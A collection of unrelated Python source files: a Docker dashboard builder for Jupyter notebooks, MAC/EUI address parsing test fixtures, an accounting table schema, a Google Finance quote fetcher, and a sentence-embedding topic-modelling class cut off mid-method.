if os.path.exists(self.build_dir):
shutil.rmtree(self.build_dir)
os.makedirs(self.build_dir)
# Remove ipydeps package installation and run during build instead
def groom_ipydeps(self):
for i in range(len(self.notebook.cells)):
cell = self.notebook.cells[i]
if cell.cell_type == 'code' and 'ipydeps' in cell.source:
output = os.path.join(self.build_dir, 'ipydeps_build.py')
with open(output, 'w') as f:
f.write(cell.source)
self.dockerfile.add_file('ipydeps_build.py')
self.dockerfile.add_build_command('python3 ipydeps_build.py')
del self.notebook.cells[i]
break
# Move 'parameters'-tagged cells to top (papermill compatibility)
def groom_parameters(self):
first_code_cell = None
parameters_cell = None
for i in range(len(self.notebook.cells)):
cell = self.notebook.cells[i]
tags = cell.get('metadata', {}).get('tags', {})
if cell.cell_type != 'code':
continue
if first_code_cell is None:
first_code_cell = i
if 'parameters' in tags:
parameters_cell = i
break
if parameters_cell is not None:
cell = self.notebook.cells[parameters_cell]
del self.notebook.cells[parameters_cell]
self.notebook.cells.insert(first_code_cell, cell)
# Remove cells tagged with 'nb2dashboard/ignore'
def groom_ignored(self):
keepers = []
for cell in self.notebook.cells:
tags = cell.get('metadata', {}).get('tags', {})
if 'nb2dashboard/ignore' not in tags:
keepers.append(cell)
self.notebook.cells = keepers
# Modify notebook for suitability with dashboard mode
def groom_notebook(self):
# Run grooming functions
self.groom_ignored()
self.groom_ipydeps()
if self.mode == 'nbparameterise':
self.groom_parameters()
# Save notebook
output = os.path.join(self.build_dir, self.notebook_filename)
with open(output, 'w') as f:
nbformat.write(self.notebook, f)
self.dockerfile.set_notebook(self.notebook_filename)
# Use local notebook file
def notebook_from_file(self, filename):
self.notebook_filename = os.path.basename(filename)
with open(filename) as f:
self.notebook = nbformat.read(f, as_version=4)
# Fetch notebook from remote URL
def notebook_from_url(self, url):
r = requests.get(url, headers={'Accept': 'application/json'})
if r.status_code != 200:
raise RuntimeError('{} {}'.format(r.status_code, r.reason))
self.notebook = nbformat.reads(r.text, as_version=4)
u = urllib.parse.urlparse(url)
self.notebook_filename = u.path.split('/')[-1]
self.metadata['url'] = url
return r
# Fetch notebook from an nbgallery instance
def notebook_from_nbgallery(self, url):
r = self.notebook_from_url(url + '/download')
self.notebook_filename = r.headers['Content-Disposition'].split('"')[1]
self.metadata['url'] = url
# Set metadata from nbgallery section of notebook metadata
def metadata_from_nbgallery_section(self):
gallery = self.notebook.get('metadata', {}).get('gallery', {})
if 'uuid' in gallery:
self.metadata['uuid'] = gallery['uuid']
if 'git_commit_id' in gallery:
self.metadata['git_commit_id'] = gallery['git_commit_id']
# Set metadata from command-line args
def metadata_from_args(self, args):
for key in ['maintainer', 'title', 'description']:
if hasattr(args, key) and getattr(args, key):
self.metadata[key] = getattr(args, key)
# Gather metadata about the notebook
def gather_metadata(self, args):
self.metadata_from_nbgallery_section()
self.metadata_from_args(args)
print('Metadata:')
for k, v in self.metadata.items():
print(k, v)
print()
# Incorporate metadata into docker image
def process_metadata(self):
labels = {
'url': 'notebook',
'maintainer': 'maintainer',
'title': 'title',
'description': 'description'
}
envs = {
'uuid': 'NBGALLERY_UUID',
'git_commit_id': 'NBGALLERY_GIT_COMMIT_ID'
}
for key, label in labels.items():
if key in self.metadata:
self.dockerfile.set_label(label, self.metadata[key])
for key, name in envs.items():
if key in self.metadata:
self.dockerfile.set_env(name, self.metadata[key])
# Write Dockerfile to build dir
def save_dockerfile(self):
output = os.path.join(self.build_dir, 'Dockerfile')
with open(output, 'w') as f:
f.write(str(self.dockerfile))
# Prep all files and save to build dir
def stage(self, args):
if args.file:
self.notebook_from_file(args.file)
elif args.url:
self.notebook_from_url(args.url)
elif args.nbgallery:
self.notebook_from_nbgallery(args.nbgallery)
self.gather_metadata(args)
self.process_metadata()
self.groom_notebook()
self.save_dockerfile()
# Build the docker image
def build(self):
command = 'sudo docker build -t nb2dashboard-{} {}'.format(self.name, self.build_dir)
print(command)
status, output = subprocess.getstatusoutput(command)
if status != 0:
print('docker build failed:')
print(output)
# Main
if __name__ == '__main__':
modes = ['voila', 'nbparameterise', 'panel']
parser = argparse.ArgumentParser(description='Build dashboard image from notebook')
parser.add_argument('--name', help='image name suffix', required=True)
parser.add_argument('--file', help='build from notebook file')
parser.add_argument('--url', help='build from notebook URL')
parser.add_argument('--nbgallery', help='build from nbgallery URL')
parser.add_argument('--mode', help='dashboard mode', default='voila', choices=modes)
parser.add_argument('--maintainer', help='image maintainer')
parser.add_argument('--title', help='notebook title')
parser.add_argument('--description', help='notebook description')
parser.add_argument('--build', help='build the image', default=False, action='store_true')
args = parser.parse_args(sys.argv[1:])
if not (args.file or args.url or args.nbgallery):
raise RuntimeError('--file, --url, or --nbgallery must be specified')
nb2dashboard = NB2Dashboard(args.name, args.mode)
nb2dashboard.stage(args)
if args.build:
nb2dashboard.build()
|
INVALID_OCTET = [
"f", # Too few digits
"fff", # Too many digits
"g" # Invalid digit
]
OCTET = [
("A0", "a0", 160, "10100000", "00000101"),
("a0", "a0", 160, "10100000", "00000101"),
("B1", "b1", 177, "10110001", "10001101"),
("b1", "b1", 177, "10110001", "10001101"),
("C2", "c2", 194, "11000010", "01000011"),
("c2", "c2", 194, "11000010", "01000011"),
("D3", "d3", 211, "11010011", "11001011"),
("d3", "d3", 211, "11010011", "11001011"),
("E4", "e4", 228, "11100100", "00100111"),
("e4", "e4", 228, "11100100", "00100111"),
("F5", "f5", 245, "11110101", "10101111"),
("f5", "f5", 245, "11110101", "10101111")
]
INVALID_IDENTIFIER = [
"0a", # Too few digits
"0a1b2c3d4e5f6", # Too many digits
"0a1b2c3d4e5g", # Invalid digit
"-0a-1b-2c-3d-4e-5f", # Leading hyphen
"0a-1b-2c-3d-4e-5f-", # Trailing hyphen
"0a-1b-2c-3d-4e5f", # Missing hyphen
":0a:1b:2c:3d:4e:5f", # Leading colon
"0a:1b:2c:3d:4e:5f:", # Trailing colon
"0a:1b:2c:3d:4e5f", # Missing colon
".0a1b.2c3d.4e5f", # Leading dot
"0a1b.2c3d.4e5f.", # Trailing dot
"0a1b.2c3d4e5f" # Missing dot
]
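# Each tuple in the EUI/ELI/NULL_EUI lists below appears to contain: the input
# string, its canonical lowercase hex form, the integer value, the binary and
# bit-reversed binary strings, 24-bit and 36-bit (prefix, extension) splits,
# and the plain, hyphen, colon and dot notations.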
EUI = [
(
"a0b1c2d3e4f5", # Plain notation (lowercase)
"a0b1c2d3e4f5",
176685338322165,
"101000001011000111000010110100111110010011110101",
"000001011000110101000011110010110010011110101111",
("a0b1c2", "d3e4f5"),
("a0b1c2d3e", "4f5"),
"a0b1c2d3e4f5",
"a0-b1-c2-d3-e4-f5",
"a0:b1:c2:d3:e4:f5",
"a0b1.c2d3.e4f5"
),
(
"A0B1C2D3E4F5", # Plain notation (uppercase)
"a0b1c2d3e4f5",
176685338322165,
"101000001011000111000010110100111110010011110101",
"000001011000110101000011110010110010011110101111",
("a0b1c2", "d3e4f5"),
("a0b1c2d3e", "4f5"),
"a0b1c2d3e4f5",
"a0-b1-c2-d3-e4-f5",
"a0:b1:c2:d3:e4:f5",
"a0b1.c2d3.e4f5"
),
(
"a0-b1-c2-d3-e4-f5", # Hyphen notation (lowercase)
"a0b1c2d3e4f5",
176685338322165,
"101000001011000111000010110100111110010011110101",
"000001011000110101000011110010110010011110101111",
("a0b1c2", "d3e4f5"),
("a0b1c2d3e", "4f5"),
"a0b1c2d3e4f5",
"a0-b1-c2-d3-e4-f5",
"a0:b1:c2:d3:e4:f5",
"a0b1.c2d3.e4f5"
),
(
"A0-B1-C2-D3-E4-F5", # Hyphen notation (uppercase)
"a0b1c2d3e4f5",
176685338322165,
"101000001011000111000010110100111110010011110101",
"000001011000110101000011110010110010011110101111",
("a0b1c2", "d3e4f5"),
("a0b1c2d3e", "4f5"),
"a0b1c2d3e4f5",
"a0-b1-c2-d3-e4-f5",
"a0:b1:c2:d3:e4:f5",
"a0b1.c2d3.e4f5"
),
(
"a0:b1:c2:d3:e4:f5", # Colon notation (lowercase)
"a0b1c2d3e4f5",
176685338322165,
"101000001011000111000010110100111110010011110101",
"000001011000110101000011110010110010011110101111",
("a0b1c2", "d3e4f5"),
("a0b1c2d3e", "4f5"),
"a0b1c2d3e4f5",
"a0-b1-c2-d3-e4-f5",
"a0:b1:c2:d3:e4:f5",
"a0b1.c2d3.e4f5"
),
(
"A0:B1:C2:D3:E4:F5", # Colon notation (uppercase)
"a0b1c2d3e4f5",
176685338322165,
"101000001011000111000010110100111110010011110101",
"000001011000110101000011110010110010011110101111",
("a0b1c2", "d3e4f5"),
("a0b1c2d3e", "4f5"),
"a0b1c2d3e4f5",
"a0-b1-c2-d3-e4-f5",
"a0:b1:c2:d3:e4:f5",
"a0b1.c2d3.e4f5"
),
(
"a0b1.c2d3.e4f5", # Dot notation (lowercase)
"a0b1c2d3e4f5",
176685338322165,
"101000001011000111000010110100111110010011110101",
"000001011000110101000011110010110010011110101111",
("a0b1c2", "d3e4f5"),
("a0b1c2d3e", "4f5"),
"a0b1c2d3e4f5",
"a0-b1-c2-d3-e4-f5",
"a0:b1:c2:d3:e4:f5",
"a0b1.c2d3.e4f5"
),
(
"A0B1.C2D3.E4F5", # Dot notation (uppercase)
"a0b1c2d3e4f5",
176685338322165,
"101000001011000111000010110100111110010011110101",
"000001011000110101000011110010110010011110101111",
("a0b1c2", "d3e4f5"),
("a0b1c2d3e", "4f5"),
"a0b1c2d3e4f5",
"a0-b1-c2-d3-e4-f5",
"a0:b1:c2:d3:e4:f5",
"a0b1.c2d3.e4f5"
)
]
ELI = [
(
"0a1b2c3d4e5f", # Plain notation (lowercase)
"0a1b2c3d4e5f",
11111822610015,
"000010100001101100101100001111010100111001011111",
"010100001101100000110100101111000111001011111010",
("0a1b2c", "3d4e5f"),
("0a1b2c3d4", "e5f"),
"0a1b2c3d4e5f",
"0a-1b-2c-3d-4e-5f",
"0a:1b:2c:3d:4e:5f",
"0a1b.2c3d.4e5f"
),
(
"0A1B2C3D4E5F", # Plain notation (uppercase)
"0a1b2c3d4e5f",
11111822610015,
"000010100001101100101100001111010100111001011111",
"010100001101100000110100101111000111001011111010",
("0a1b2c", "3d4e5f"),
("0a1b2c3d4", "e5f"),
"0a1b2c3d4e5f",
"0a-1b-2c-3d-4e-5f",
"0a:1b:2c:3d:4e:5f",
"0a1b.2c3d.4e5f"
),
(
"0a-1b-2c-3d-4e-5f", # Hyphen notation (lowercase)
"0a1b2c3d4e5f",
11111822610015,
"000010100001101100101100001111010100111001011111",
"010100001101100000110100101111000111001011111010",
("0a1b2c", "3d4e5f"),
("0a1b2c3d4", "e5f"),
"0a1b2c3d4e5f",
"0a-1b-2c-3d-4e-5f",
"0a:1b:2c:3d:4e:5f",
"0a1b.2c3d.4e5f"
),
(
"0A-1B-2C-3D-4E-5F", # Hyphen notation (uppercase)
"0a1b2c3d4e5f",
11111822610015,
"000010100001101100101100001111010100111001011111",
"010100001101100000110100101111000111001011111010",
("0a1b2c", "3d4e5f"),
("0a1b2c3d4", "e5f"),
"0a1b2c3d4e5f",
"0a-1b-2c-3d-4e-5f",
"0a:1b:2c:3d:4e:5f",
"0a1b.2c3d.4e5f"
),
(
"0a:1b:2c:3d:4e:5f", # Colon notation (lowercase)
"0a1b2c3d4e5f",
11111822610015,
"000010100001101100101100001111010100111001011111",
"010100001101100000110100101111000111001011111010",
("0a1b2c", "3d4e5f"),
("0a1b2c3d4", "e5f"),
"0a1b2c3d4e5f",
"0a-1b-2c-3d-4e-5f",
"0a:1b:2c:3d:4e:5f",
"0a1b.2c3d.4e5f"
),
(
"0A:1B:2C:3D:4E:5F", # Colon notation (uppercase)
"0a1b2c3d4e5f",
11111822610015,
"000010100001101100101100001111010100111001011111",
"010100001101100000110100101111000111001011111010",
("0a1b2c", "3d4e5f"),
("0a1b2c3d4", "e5f"),
"0a1b2c3d4e5f",
"0a-1b-2c-3d-4e-5f",
"0a:1b:2c:3d:4e:5f",
"0a1b.2c3d.4e5f"
),
(
"0a1b.2c3d.4e5f", # Dot notation (lowercase)
"0a1b2c3d4e5f",
11111822610015,
"000010100001101100101100001111010100111001011111",
"010100001101100000110100101111000111001011111010",
("0a1b2c", "3d4e5f"),
("0a1b2c3d4", "e5f"),
"0a1b2c3d4e5f",
"0a-1b-2c-3d-4e-5f",
"0a:1b:2c:3d:4e:5f",
"0a1b.2c3d.4e5f"
),
(
"0A1B.2C3D.4E5F", # Dot notation (uppercase)
"0a1b2c3d4e5f",
11111822610015,
"000010100001101100101100001111010100111001011111",
"010100001101100000110100101111000111001011111010",
("0a1b2c", "3d4e5f"),
("0a1b2c3d4", "e5f"),
"0a1b2c3d4e5f",
"0a-1b-2c-3d-4e-5f",
"0a:1b:2c:3d:4e:5f",
"0a1b.2c3d.4e5f"
)
]
NULL_EUI = [
(
"ffffffffffff", # Plain notation (lowercase)
"ffffffffffff",
281474976710655,
"111111111111111111111111111111111111111111111111",
"111111111111111111111111111111111111111111111111",
("ffffff", "ffffff"),
("fffffffff", "fff"),
"ffffffffffff",
"ff-ff-ff-ff-ff-ff",
"ff:ff:ff:ff:ff:ff",
"ffff.ffff.ffff"
),
(
"FFFFFFFFFFFF", # Plain notation (uppercase)
"ffffffffffff",
281474976710655,
"111111111111111111111111111111111111111111111111",
"111111111111111111111111111111111111111111111111",
("ffffff", "ffffff"),
("fffffffff", "fff"),
"ffffffffffff",
"ff-ff-ff-ff-ff-ff",
"ff:ff:ff:ff:ff:ff",
"ffff.ffff.ffff"
),
(
"ff-ff-ff-ff-ff-ff", # Hyphen notation (lowercase)
"ffffffffffff",
281474976710655,
"111111111111111111111111111111111111111111111111",
"111111111111111111111111111111111111111111111111",
("ffffff", "ffffff"),
("fffffffff", "fff"),
"ffffffffffff",
"ff-ff-ff-ff-ff-ff",
"ff:ff:ff:ff:ff:ff",
"ffff.ffff.ffff"
),
(
"FF-FF-FF-FF-FF-FF", # Hyphen notation (uppercase)
"ffffffffffff",
281474976710655,
"111111111111111111111111111111111111111111111111",
"111111111111111111111111111111111111111111111111",
("ffffff", "ffffff"),
("fffffffff", "fff"),
"ffffffffffff",
"ff-ff-ff-ff-ff-ff",
"ff:ff:ff:ff:ff:ff",
"ffff.ffff.ffff"
),
(
"ff:ff:ff:ff:ff:ff", # Colon notation (lowercase)
"ffffffffffff",
281474976710655,
"111111111111111111111111111111111111111111111111",
"111111111111111111111111111111111111111111111111",
("ffffff", "ffffff"),
("fffffffff", "fff"),
"ffffffffffff",
"ff-ff-ff-ff-ff-ff",
"ff:ff:ff:ff:ff:ff",
"ffff.ffff.ffff"
),
(
"FF:FF:FF:FF:FF:FF", # Colon notation (uppercase)
"ffffffffffff",
281474976710655,
"111111111111111111111111111111111111111111111111",
"111111111111111111111111111111111111111111111111",
("ffffff", "ffffff"),
("fffffffff", "fff"),
"ffffffffffff",
"ff-ff-ff-ff-ff-ff",
"ff:ff:ff:ff:ff:ff",
"ffff.ffff.ffff"
),
(
"ffff.ffff.ffff", # Dot notation (lowercase)
"ffffffffffff",
281474976710655,
"111111111111111111111111111111111111111111111111",
"111111111111111111111111111111111111111111111111",
("ffffff", "ffffff"),
("fffffffff", "fff"),
"ffffffffffff",
"ff-ff-ff-ff-ff-ff",
"ff:ff:ff:ff:ff:ff",
"ffff.ffff.ffff"
),
(
"FFFF.FFFF.FFFF", # Dot notation (uppercase)
"ffffffffffff",
281474976710655,
"111111111111111111111111111111111111111111111111",
"111111111111111111111111111111111111111111111111",
("ffffff", "ffffff"),
("fffffffff", "fff"),
"ffffffffffff",
"ff-ff-ff-ff-ff-ff",
"ff:ff:ff:ff:ff:ff",
"ffff.ffff.ffff"
)
]
INVALID_ADDRESS = INVALID_IDENTIFIER
BROADCAST = "ffffffffffff"
MULTICAST = "0180c2000000" # Link-Layer Discovery Protocol
UAA_UNICAST = "a0b1c2d3e4f5"
LAA_UNICAST = "aab1c2d3e4f5"
|
# table definition
table = {
'table_name' : 'ap_terms_codes',
'module_id' : 'ap',
'short_descr' : 'Terms codes',
'long_descr' : 'Terms codes',
'sub_types' : None,
'sub_trans' : None,
'sequence' : ['seq', [], None],
'tree_params' : None,
'roll_params' : None,
'indexes' : None,
'ledger_col' : None,
'defn_company' : None,
'data_company' : None,
'read_only' : False,
}
# column definitions
cols = []
cols.append ({
'col_name' : 'row_id',
'data_type' : 'AUTO',
'short_descr': 'Row id',
'long_descr' : 'Row id',
'col_head' : 'Row',
'key_field' : 'Y',
'data_source': 'gen',
'condition' : None,
'allow_null' : False,
'allow_amend': False,
'max_len' : 0,
'db_scale' : 0,
'scale_ptr' : None,
'dflt_val' : None,
'dflt_rule' : None,
'col_checks' : None,
'fkey' : None,
'choices' : None,
})
cols.append ({
'col_name' : 'created_id',
'data_type' : 'INT',
'short_descr': 'Created id',
'long_descr' : 'Created row id',
'col_head' : 'Created',
'key_field' : 'N',
'data_source': 'gen',
'condition' : None,
'allow_null' : False,
'allow_amend': False,
'max_len' : 0,
'db_scale' : 0,
'scale_ptr' : None,
'dflt_val' : '0',
'dflt_rule' : None,
'col_checks' : None,
'fkey' : None,
'choices' : None,
})
cols.append ({
'col_name' : 'deleted_id',
'data_type' : 'INT',
'short_descr': 'Deleted id',
'long_descr' : 'Deleted row id',
'col_head' : 'Deleted',
'key_field' : 'N',
'data_source': 'gen',
'condition' : None,
'allow_null' : False,
'allow_amend': False,
'max_len' : 0,
'db_scale' : 0,
'scale_ptr' : None,
'dflt_val' : '0',
'dflt_rule' : None,
'col_checks' : None,
'fkey' : None,
'choices' : None,
})
cols.append ({
'col_name' : 'terms_code',
'data_type' : 'TEXT',
'short_descr': 'Terms code',
'long_descr' : 'Terms code',
'col_head' : 'Code',
'key_field' : 'A',
'data_source': 'input',
'condition' : None,
'allow_null' : False,
'allow_amend': False,
'max_len' : 15,
'db_scale' : 0,
'scale_ptr' : None,
'dflt_val' : None,
'dflt_rule' : None,
'col_checks' : None,
'fkey' : None,
'choices' : None,
})
cols.append ({
'col_name' : 'descr',
'data_type' : 'TEXT',
'short_descr': 'Description',
'long_descr' : 'Description',
'col_head' : 'Description',
'key_field' : 'N',
'data_source': 'input',
'condition' : None,
'allow_null' : False,
'allow_amend': True,
'max_len' : 30,
'db_scale' : 0,
'scale_ptr' : None,
'dflt_val' : None,
'dflt_rule' : None,
'col_checks' : None,
'fkey' : None,
'choices' : None,
})
cols.append ({
'col_name' : 'seq',
'data_type' : 'INT',
'short_descr': 'Sequence',
'long_descr' : 'Sequence',
'col_head' : 'Seq',
'key_field' : 'N',
'data_source': 'seq',
'condition' : None,
'allow_null' : False,
'allow_amend': True,
'max_len' : 0,
'db_scale' : 0,
'scale_ptr' : None,
'dflt_val' : None,
'dflt_rule' : None,
'col_checks' : None,
'fkey' : None,
'choices' : None,
})
# discount - [disc perc (dec), terms (int), type(P=periods/D=days/M=calendar day)]
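# e.g. a hypothetical value of [2.5, 30, 'D'] would mean a 2.5% discount if settled within 30 days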
cols.append ({
'col_name' : 'discount_rule',
'data_type' : 'JSON',
'short_descr': 'Discount',
'long_descr' : 'Discount rule',
'col_head' : 'Discount',
'key_field' : 'N',
'data_source': 'input',
'condition' : None,
'allow_null' : False,
'allow_amend': True,
'max_len' : 0,
'db_scale' : 0,
'scale_ptr' : None,
'dflt_val' : None,
'dflt_rule' : None,
'col_checks' : None,
'fkey' : None,
'choices' : None,
})
# due - [instalments (int), terms (int), type(P=periods/D=days/M=calendar day)]
cols.append ({
'col_name' : 'due_rule',
'data_type' : 'JSON',
'short_descr': 'Payment due',
'long_descr' : 'Payment due rule',
'col_head' : 'Due',
'key_field' : 'N',
'data_source': 'input',
'condition' : None,
'allow_null' : False,
'allow_amend': True,
'max_len' : 0,
'db_scale' : 0,
'scale_ptr' : None,
'dflt_val' : None,
'dflt_rule' : None,
'col_checks' : None,
'fkey' : None,
'choices' : None,
})
# arrears - [interest rate (dec), terms (int), type(P=periods/D=days/M=calendar day)]
cols.append ({
'col_name' : 'arrears_rule',
'data_type' : 'JSON',
'short_descr': 'Arrears',
'long_descr' : 'Arrears rule',
'col_head' : 'Arrears',
'key_field' : 'N',
'data_source': 'input',
'condition' : None,
'allow_null' : False,
'allow_amend': True,
'max_len' : 0,
'db_scale' : 0,
'scale_ptr' : None,
'dflt_val' : None,
'dflt_rule' : None,
'col_checks' : None,
'fkey' : None,
'choices' : None,
})
# virtual column definitions
virt = []
# cursor definitions
cursors = []
cursors.append({
'cursor_name': 'terms_codes',
'title': 'Maintain ap terms codes',
'columns': [
['terms_code', 80, False, False],
['descr', 200, True, False],
],
'filter': [],
'sequence': [['seq', False]],
'formview_name': 'setup_ap_terms_codes',
})
# actions
actions = []
|
# -*- coding: utf-8 -*-
#
# Author: RedSpiderMkV
#
# Created: 20/06/2014
# Copyright: (c) RedSpiderMkV 2014
# Licence: <your licence>
#-------------------------------------------------------------------------------
import urllib2
from HistoricalQuote_Base import HistoricalQuoteBase
class HistoricalQuote(HistoricalQuoteBase):
def __init__(self):
self.url = ('http://www.google.co.uk/finance/historical?'
'q={0}&startdate={1}&enddate={2}&output=csv')
def GetData(self, symbol, sDate, eDate):
startDate = sDate.replace('-','+')
endDate = eDate.replace('-', '+')
try:
url = str.format(self.url, symbol, startDate, endDate)
request = (urllib2.urlopen(url)).read().strip()
except Exception as e:
print(e)
return ""
request = unicode(request, 'utf-8-sig')
return self.FormatList(request)
|
import datetime as dt
import pickle
import hdbscan
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
from tqdm import tqdm
from loguru import logger
from sentence_transformers import SentenceTransformer
from spacy.lang.en import English
from transformertopic.clusterRepresentators import TextRank
from transformertopic.clusterRepresentators.tfidf import Tfidf
from transformertopic.dimensionReducers import UmapEmbeddings
from transformertopic.utils import generateTextId, scrambleDateColumn, showWordCloudFromScoresDict
Sentencizer = English()
Sentencizer.add_pipe("sentencizer")
class TransformerTopic():
"""
    Class representing a BERTopic-style topic model.
"""
def __init__(self, dimensionReducer=None, hdbscanMinClusterSize=25, stEmbeddings=None):
"""
        hdbscanMinClusterSize: hdbscan parameter; minimum size of a topic. Higher => fewer topics.
stEmbeddings: embeddings model for SentenceTransformer. See available models at https://huggingface.co/sentence-transformers?sort=downloads
"""
if dimensionReducer is None:
dimensionReducer = UmapEmbeddings()
self.dimensionReducer = dimensionReducer
# MODEL PARAMETERS:
if stEmbeddings is None:
stEmbeddings = "paraphrase-MiniLM-L6-v2"
self.stEmbeddingsModel = stEmbeddings
self.hdbscanMinClusterSize = hdbscanMinClusterSize
self.hdbscanMetric = 'euclidean'
self.hdbscanClusterSelectionMethod = 'eom'
# INPUT DATA
self.nOriginalDocuments = 0
self.df = None
self.clusterRepresentator = None
# GENERATED DATA
self.twoDEmbeddings = None
self.nBatches = 0
self.nTopics = -1
self.runFullCompleted = False
self.clusterRepresentations = None
self.topicSizes = None
self.stEmbeddings = None
self.reducedEmbeddings = None
self.clusters = None
self.topicNames = None
def savePickle(self, filepath):
f = open(filepath, 'wb')
pickle.dump(self.__dict__, f, protocol=4)
f.close()
logger.debug(f"Pickled class to {filepath}")
def loadPickle(self, filepath):
f = open(filepath, 'rb')
tmpdict = pickle.load(f)
f.close()
self.__dict__.update(tmpdict)
logger.debug(f"Loaded class from {filepath}")
def saveCsv(self, filepath):
self.df.to_csv(filepath)
def loadCsv(self, filepath, dateColumn='date', textColumn='text'):
self.df = pd.read_csv(filepath)
        self.df = self.df.rename(columns={dateColumn: 'date', textColumn: 'text'})
self.df['date'] = pd.to_datetime(self.df['date'])
self.nTopics = 1 + int(self.df['topic'].max())
self.nBatches = int(self.df['batch'].max())
def train(
self,
documentsDataFrame=None,
dateColumn='date',
textColumn='text',
idColumn=None,
copyOtherColumns=False
):
"""
Runs the full clustering procedure - slow.
documentsDataFrame: dataFrame containing documents
idColumn: name of column containing unique id of document
dateColumn: name of column containing date of document
textColumn: name of column containing text of document
"""
logger.debug("train: start")
if documentsDataFrame is not None:
self.nOriginalDocuments = len(documentsDataFrame)
self.df = documentsDataFrame.copy()
self.df = pd.DataFrame(self._getSplitSentencesData(
dataFrame=self.df,
dateColumn=dateColumn,
textColumn=textColumn,
idColumn=idColumn,
copyOtherColumns=copyOtherColumns
))
self.df["date"] = pd.to_datetime(self.df["date"])
self.df['batch'] = 1
self.nBatches = 1
elif self.df is None:
            raise Exception(
                "Either documentsDataFrame must be passed or self.df must not be None")
texts = list(self.df["text"])
# textIds = list(self.df["id"])
if self.stEmbeddings is None:
logger.debug(
f"train: computing SentenceTransformer embeddings for {self.stEmbeddingsModel}")
self.stModel = SentenceTransformer(self.stEmbeddingsModel)
self.stEmbeddings = {}
self.stEmbeddings[1] = self.stModel.encode(
texts, show_progress_bar=False)
if self.reducedEmbeddings is None:
self.reducedEmbeddings = {}
self.reducedEmbeddings[1] = self.dimensionReducer.fit_transform(
self.stEmbeddings[1])
if self.clusters is None:
logger.debug(
f"train: computing HDBSCAN with min_cluster_size = {self.hdbscanMinClusterSize}, metric = {self.hdbscanMetric}, cluster_selection_method = {self.hdbscanClusterSelectionMethod}"
)
self.clusterer = hdbscan.HDBSCAN(min_cluster_size=self.hdbscanMinClusterSize,
metric=self.hdbscanMetric,
cluster_selection_method=self.hdbscanClusterSelectionMethod,
prediction_data=True)
self.clusters = {}
self.clusters[1] = self.clusterer.fit(self.reducedEmbeddings[1])
# self.documentIdsToTopics = {}
# self.topicsToDocumentIds = {k: set() for k in self.clusters[1].labels_}
for doubleIdx, label in np.ndenumerate(self.clusters[1].labels_):
idx = doubleIdx[0]
# tId = textIds[idx]
# self.documentIdsToTopics[tId] = label
# self.topicsToDocumentIds[label].add(tId)
self.df.at[idx, "topic"] = int(label)
self.nTopics = self.clusters[1].labels_.max() + 1
self.runFullCompleted = True
logger.debug("train: completed")
def _getSplitSentencesData(self,
dataFrame,
dateColumn,
textColumn,
idColumn=None,
copyOtherColumns=False):
data = []
for index, row in dataFrame.iterrows():
date = row[dateColumn]
fulltext = row[textColumn]
if idColumn is None:
id = generateTextId(fulltext)
else:
id = row[idColumn]
            if isinstance(fulltext, float):  # skip NaN / non-string text
                continue
sents = Sentencizer(fulltext).sents
for sent in sents:
newRow = {
"id": id,
"date": date,
"text": str(sent)
}
if copyOtherColumns:
for column in set(dataFrame.columns).difference({"id", "date", "text"}):
newRow[column] = row[column]
data.append(newRow)
return data
def getTopicsForDoc(self, documentId):
subdf = self.df.loc[self.df["id"] == documentId]
return list(subdf["topic"])
def infer(self, newDocumentsDataFrame, dateColumn, textColumn, idColumn=None):
"""
Runs HDBSCAN approximate inference on new texts.
The new DataFrame needs to have the same id, text and date columns as the original one.
"""
if not self.runFullCompleted:
raise Exception("No model computed")
tmpDf = pd.DataFrame(self._getSplitSentencesData(
dataFrame=newDocumentsDataFrame,
dateColumn=dateColumn,
textColumn=textColumn,
idColumn=idColumn
))
indexesAlreadyPresent = set(
self.df["id"]).intersection(set(tmpDf["id"]))
tmpDf = tmpDf[~tmpDf["id"].isin(indexesAlreadyPresent)]
batch = self.nBatches + 1
tmpDf['batch'] = batch
texts = list(tmpDf["text"])
textIds = list(tmpDf["id"])
# sentence transformer
logger.debug(
f"infer: computing SentenceTransformer embeddings for {self.stEmbeddingsModel}")
self.stEmbeddings[batch] = self.stModel.encode(
texts, show_progress_bar=False)
self.reducedEmbeddings[batch] = self.dimensionReducer.fit_transform(
self.stEmbeddings[batch])
logger.debug(
f"infer: computing HDBSCAN with min_cluster_size = {self.hdbscanMinClusterSize}, metric = {self.hdbscanMetric}, cluster_selection_method = {self.hdbscanClusterSelectionMethod}"
)
# hdbscan inference
labels, strengths = hdbscan.approximate_predict(
self.clusterer, self.reducedEmbeddings[batch])
# assign topics in tmpDf
for doubleIdx, label in np.ndenumerate(labels):
idx = doubleIdx[0]
tId = textIds[idx]
tmpDf.loc[tmpDf["id"] == tId, "topic"] = int(label)
        self.df = pd.concat([self.df, tmpDf])
self.nBatches += 1
logger.debug("infer: inference completed")
def _compute2dEmbeddings(self, batch):
if not self.runFullCompleted:
raise Exception("No model computed")
logger.debug("_compute2dEmbeddings: start")
if self.twoDEmbeddings is None:
self.twoDEmbeddings = {}
self.twoDEmbeddings[batch] = self.dimensionReducer.fit_transform2d(
self.stEmbeddings[batch])
logger.debug("_compute2dEmbeddings: completed")
def plotClusters(self, batch=1):
if not self.runFullCompleted:
raise Exception("No model computed")
if self.twoDEmbeddings is None or batch not in self.twoDEmbeddings.keys():
self._compute2dEmbeddings(batch)
logger.debug("plotClusters")
result = pd.DataFrame(self.twoDEmbeddings[batch], columns=['x', 'y'])
result['labels'] = self.clusters[batch].labels_
# Visualize clusters
fig, ax = plt.subplots(figsize=(20, 10))
outliers = result.loc[result.labels == -1, :]
clustered = result.loc[result.labels != -1, :]
plt.scatter(outliers.x, outliers.y, color='#BDBDBD', s=0.05)
plt.scatter(clustered.x, clustered.y,
c=clustered.labels, s=0.05, cmap='hsv_r')
plt.colorbar()
plt.show()
def _computeClusterRepresentations(self,
topics=None,
nKeywords=25,
clusterRepresentator=None,
):
"""
Computes representation of clusters for wordclouds.
"""
if topics is None:
topics = range(self.nTopics)
topicSet = set(topics)
if clusterRepresentator is None and self.clusterRepresentator is None:
self.clusterRepresentator = Tfidf()
if self.clusterRepresentator is None or (clusterRepresentator is not None and clusterRepresentator != self.clusterRepresentator):
self.clusterRepresentator = clusterRepresentator
self.clusterRepresentations = {}
self.topicNames = {}
topicsToCompute = topicSet
else:
assert self.clusterRepresentations is not None
topicsToCompute = topicSet.difference(
set(self.clusterRepresentations.keys()))
firstbatchdf = self.df[self.df['batch'] == 1]
if len(topicsToCompute) == 0:
return
print(
f"Computing cluster representations for topics {topicsToCompute}")
for cluster_idx in tqdm(topicsToCompute):
topicDf = firstbatchdf[firstbatchdf['topic'] == cluster_idx]
